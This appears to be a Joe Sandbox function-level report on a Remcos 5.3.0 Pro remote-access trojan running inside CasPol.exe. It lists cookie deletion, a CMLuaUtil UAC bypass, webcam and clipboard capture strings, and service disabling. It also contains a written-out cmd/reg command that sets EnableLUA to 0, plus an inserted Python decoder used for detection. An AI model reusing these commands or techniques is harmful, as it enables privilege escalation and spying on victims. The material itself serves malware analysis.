• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
APIs
  • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
  • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
  • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
• ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
• PathFileExistsA.SHLWAPI(?), ref: 0040B779
Strings
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
• API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
• String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
• API String ID: 1133728706-4073444585
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
• int.LIBCPMT ref: 0040FC0F
  • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
  • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
• std::_Facet_Register.LIBCPMT ref: 0040FC4B
• std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
• String ID: P[G
• API String ID: 2536120697-571123470
APIs
  • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
• _free.LIBCMT ref: 0044FD29
  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
• _free.LIBCMT ref: 0044FD34
• _free.LIBCMT ref: 0044FD3F
• _free.LIBCMT ref: 0044FD93
• _free.LIBCMT ref: 0044FD9E
• _free.LIBCMT ref: 0044FDA9
• _free.LIBCMT ref: 0044FDB4
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406835
  • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
  • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
• CoUninitialize.OLE32 ref: 0040688E
• API ID: InitializeObjectUninitialize_wcslen
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
• API String ID: 3851391207-2637227304
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
• int.LIBCPMT ref: 0040FEF2
  • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
  • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
• std::_Facet_Register.LIBCPMT ref: 0040FF2E
• std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
• String ID: H]G
• API String ID: 2536120697-1717957184
APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
• GetLastError.KERNEL32 ref: 0040B2EE
Strings
• [Chrome Cookies not found], xrefs: 0040B308
• [Chrome Cookies found, cleared!], xrefs: 0040B314
• \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
• UserProfile, xrefs: 0040B2B4
• API ID: DeleteErrorFileLast
• String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
• API String ID: 2018770650-304995407
APIs
• AllocConsole.KERNEL32(00474358), ref: 0041BEB9
• ShowWindow.USER32(00000000,00000000), ref: 0041BED2
• SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
• API ID: Console$AllocOutputShowWindow
• String ID: Remcos v$5.3.0 Pro$CONOUT$
• API String ID: 2425139147-2527699604
• API ID:
• String ID: (CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$BG
• API String ID: 0-3292752334
APIs
• __allrem.LIBCMT ref: 00439789
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
• __allrem.LIBCMT ref: 004397BC
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
• __allrem.LIBCMT ref: 004397F1
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
• API ID: __cftoe
• String ID:
• API String ID: 4189289331-0
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __freea$__alloca_probe_16
                                                                                                            • String ID: a/p$am/pm
                                                                                                            • API String ID: 3509577899-3206640213
                                                                                                            • Opcode ID: 3e928ede4659587d97ed5dfbbe89dc282e212a9f54712889c1654def3b5faaeb
                                                                                                            • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                                                                            • Opcode Fuzzy Hash: 3e928ede4659587d97ed5dfbbe89dc282e212a9f54712889c1654def3b5faaeb
                                                                                                            • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                                              • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: H_prologSleep
                                                                                                            • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                                                            • API String ID: 3469354165-462540288
                                                                                                            • Opcode ID: a88306c6b6b22483e33f2cfd5532959f9b9ab3ef250dc344f137d7fc927df87a
                                                                                                            • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                                                                            • Opcode Fuzzy Hash: a88306c6b6b22483e33f2cfd5532959f9b9ab3ef250dc344f137d7fc927df87a
                                                                                                            • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                                                                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                            • String ID:
                                                                                                            • API String ID: 493672254-0
                                                                                                            • Opcode ID: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                                            • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                                                                            • Opcode Fuzzy Hash: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                                            • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                                                                            • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                            • String ID:
                                                                                                            • API String ID: 3852720340-0
                                                                                                            • Opcode ID: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                            • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                                                                            • Opcode Fuzzy Hash: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                            • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                            • _free.LIBCMT ref: 00446EF6
                                                                                                            • _free.LIBCMT ref: 00446F1E
                                                                                                            • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                            • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                            • _abort.LIBCMT ref: 00446F3D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                            • String ID:
                                                                                                            • API String ID: 3160817290-0
                                                                                                            • Opcode ID: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
                                                                                                            • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                                                                            • Opcode Fuzzy Hash: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
                                                                                                            • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                            • String ID:
                                                                                                            • API String ID: 221034970-0
                                                                                                            • Opcode ID: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
                                                                                                            • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                                                                            • Opcode Fuzzy Hash: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
                                                                                                            • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                                                                            • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                            • String ID:
                                                                                                            • API String ID: 221034970-0
                                                                                                            • Opcode ID: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                                                            • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                                                                            • Opcode Fuzzy Hash: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                                                            • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                                                                            • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                            • String ID:
                                                                                                            • API String ID: 221034970-0
                                                                                                            • Opcode ID: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                                                            • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                                                                            • Opcode Fuzzy Hash: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                                                            • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
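The four service-control records above (ChangeServiceConfigW once, ControlService three times with control codes 1, 2 and 3) and the CreateWindowExA record further down are only readable once the hex arguments are given their Windows SDK names. The Python below is an added example, not part of the Joe Sandbox report and not code from the analysed sample: it parses the report's "APIs" listing lines and annotates the arguments that matter. The sample lines are copied from the records on this page. One assumption is labelled in the code: the report appears to print the 32-bit values 0xFFFFFFFF (SERVICE_NO_CHANGE) and 0xFFFFFFFD (HWND_MESSAGE) as 000000FF and 000000FD, which is inferred from the argument positions in which they occur here.

```python
"""Decode the hex arguments in Joe Sandbox "APIs" listings.

Added example; not part of the Joe Sandbox report and not code from the sample.
A listing line looks like  • Api.MODULE(arg0,arg1,...), ref: ADDRESS  with hex
arguments and '?' for unresolved values. Constant names are from the Windows SDK.
Assumption: this report prints the 32-bit values 0xFFFFFFFF and 0xFFFFFFFD as
000000FF and 000000FD (they sit exactly where SERVICE_NO_CHANGE and HWND_MESSAGE belong).
"""
import re
from typing import Dict, List, Optional, Tuple

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})")

SERVICE_START_TYPE = {0: "SERVICE_BOOT_START", 1: "SERVICE_SYSTEM_START", 2: "SERVICE_AUTO_START",
                      3: "SERVICE_DEMAND_START", 4: "SERVICE_DISABLED"}
SERVICE_CONTROL = {1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE",
                   3: "SERVICE_CONTROL_CONTINUE", 4: "SERVICE_CONTROL_INTERROGATE"}
SERVICE_ACCESS = {0x1: "SERVICE_QUERY_CONFIG", 0x2: "SERVICE_CHANGE_CONFIG", 0x4: "SERVICE_QUERY_STATUS",
                  0x8: "SERVICE_ENUMERATE_DEPENDENTS", 0x10: "SERVICE_START", 0x20: "SERVICE_STOP",
                  0x40: "SERVICE_PAUSE_CONTINUE", 0x80: "SERVICE_INTERROGATE"}


def parse_api_line(line: str) -> Optional[Dict]:
    """Return {'api','module','args','ref','subcall'}, or None for non-API lines."""
    m = API_LINE.match(line)
    if not m:
        return None
    args: List[Optional[int]] = []
    if m.group("args"):
        for tok in m.group("args").split(","):
            tok = tok.strip()
            args.append(None if tok == "?" else int(tok, 16))
    return {"api": m.group("api"), "module": m.group("module"), "args": args,
            "ref": int(m.group("ref"), 16), "subcall": m.group("sub")}


def _is_negative(value: int, n: int) -> bool:
    """value is n as a 32-bit word, or as the single byte this report prints for it (assumption)."""
    return value in (n & 0xFFFFFFFF, n & 0xFF)


def _flags(value: int, table: Dict[int, str]) -> str:
    names = [name for bit, name in table.items() if value & bit]
    if value & ~sum(table):
        names.append(hex(value & ~sum(table)))
    return "|".join(names) or "0"


def decode(call: Dict) -> List[str]:
    """Name the arguments that matter in the service-control and window calls."""
    api, args = call["api"], call["args"]
    arg = lambda i: args[i] if i < len(args) else None
    notes: List[str] = []
    if api == "ChangeServiceConfigW" and arg(2) is not None:
        if arg(1) is not None and _is_negative(arg(1), -1):
            notes.append("dwServiceType=SERVICE_NO_CHANGE")
        start = arg(2)
        notes.append("dwStartType=" + ("SERVICE_NO_CHANGE" if _is_negative(start, -1)
                                       else SERVICE_START_TYPE.get(start, hex(start))))
    elif api == "ControlService" and arg(1) is not None:
        notes.append("dwControl=" + SERVICE_CONTROL.get(arg(1), hex(arg(1))))
    elif api == "OpenServiceW" and arg(2) is not None:
        notes.append("dwDesiredAccess=" + _flags(arg(2), SERVICE_ACCESS))
    elif api == "CreateWindowExA" and arg(8) is not None and _is_negative(arg(8), -3):
        notes.append("hWndParent=HWND_MESSAGE (message-only window, never displayed)")
    return notes


def summarize(report_lines: List[str]) -> List[Tuple[str, str, str]]:
    """(ref, api, decoded arguments) for every listing line that decodes to something."""
    out = []
    for line in report_lines:
        call = parse_api_line(line)
        notes = decode(call) if call else []
        if notes:
            out.append((f"{call['ref']:08X}", call["api"], "; ".join(notes)))
    return out


def flag_service_tampering(report_lines: List[str]) -> List[str]:
    """Refs of calls that disable or stop a service: the pattern a detection should key on."""
    return [ref for ref, _, note in summarize(report_lines)
            if "SERVICE_DISABLED" in note or "SERVICE_CONTROL_STOP" in note]


# Listing lines copied from the function records in this report (the disable sequence,
# one stop sequence, and the message-window creation).
SAMPLE = [
    "• OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC",
    "• OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10",
    "• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52",
    "• OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43",
    "• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F",
    "• CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87",
]

if __name__ == "__main__":
    for ref, api, note in summarize(SAMPLE):
        print(f"{ref}  {api:<22} {note}")
    print("service tampering at:", flag_service_tampering(SAMPLE))
```

Read together, the decoded output shows the sample opening a service with SERVICE_CHANGE_CONFIG and setting its start type to SERVICE_DISABLED, then separate routines that open it with SERVICE_STOP or SERVICE_PAUSE_CONTINUE and send stop, pause and continue controls. The access mask requested from OpenServiceW in each routine matches the control that follows, which is why the three ControlService routines differ only in the 0x20/0x40 access value and the control code. For detection, ChangeServiceConfigW with dwStartType 4 issued by a process that is not a service installer is the call to alert on.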
                                                                                                            APIs
                                                                                                            • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Enum$InfoQueryValue
                                                                                                            • String ID: [regsplt]$DG
                                                                                                            • API String ID: 3554306468-1089238109
                                                                                                            • Opcode ID: 668e6125bc102b06f08f4022fce7d3e72e6b7aa882a9d0668b883ab2701ec6ad
                                                                                                            • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                                                                            • Opcode Fuzzy Hash: 668e6125bc102b06f08f4022fce7d3e72e6b7aa882a9d0668b883ab2701ec6ad
                                                                                                            • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                                            APIs
                                                                                                              • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                              • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                              • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                            • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                                              • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                              • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                            • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                                                                            • API String ID: 2974294136-753205382
                                                                                                            • Opcode ID: 04bb198fbbe4769673077618b9268d4d887794de53c6d81a72813602c084add1
                                                                                                            • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                                                                            • Opcode Fuzzy Hash: 04bb198fbbe4769673077618b9268d4d887794de53c6d81a72813602c084add1
                                                                                                            • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                                                                            APIs
                                                                                                            • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                            • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                            • GetLastError.KERNEL32 ref: 0041CA91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                            • String ID: 0$MsgWindowClass
                                                                                                            • API String ID: 2877667751-2410386613
                                                                                                            • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                            • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                                                                            • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                            • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                                            Strings
                                                                                                            • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                                            • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$CreateProcess
                                                                                                            • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                            • API String ID: 2922976086-4183131282
